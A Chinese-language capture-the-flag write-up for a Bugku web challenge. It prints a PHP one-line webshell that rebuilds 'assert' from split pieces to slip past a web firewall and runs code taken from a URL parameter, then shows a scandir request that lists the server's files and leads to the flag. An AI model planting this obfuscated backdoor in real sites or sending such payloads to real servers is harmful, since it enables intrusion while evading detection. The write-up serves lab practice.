过狗一句话

过狗一句话

100

http://123.206.87.240:8010/

送给大家一个过狗一句话 <?php $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) ?>

1.代码审计

访问网站发现无内容

开始分析所给的代码

<?php 
$poc = "a#s#s#e#r#t";
$poc_1 = explode("#", $poc);
$poc_2 = $poc_1[0] . $poc_1[1] . $poc_1[2] . $poc_1[3] . $poc_1[4] . $poc_1[5];
$poc_2($_GET['s'])
?>

代码审计发现$poc_2($_GET['s']) 可能存在代码执行漏洞,或者后门

2.构造漏洞

  1. 使用菜刀进行连接,发现没用

  2. php中读取目录下文件的方法:

    最简单的是print_r(scandir($dir)),还可以利用print_r(glob("."))

    scandir() //作用能扫描文件夹下的目录和文件,返回值为所有文件名组成的一个数组

    show_source() //显示文件源码

    highlight_file() //和show_source()函数是一个意思

  3. 构造代码 `http://123.206.87.240:8010/index.php?s=print_r(scandir(%27./%27))

Array ( [0] => . [1] => .. [2] => c.php [3] => flag_sm1skla1.txt [4] => index.php [5] => info.php [6] => test3 [7] => zaq.php [8] => zzz.php [9] => zzz1.php )
  1. 发现关键字 flag_sm1skla1.txt

网站进行访问,找到flag

BUGKU{bugku_web_009801_a}
By 吾空 发布            此页面修订于: 2019-05-23 17:43:15

results matching ""

    No results matching ""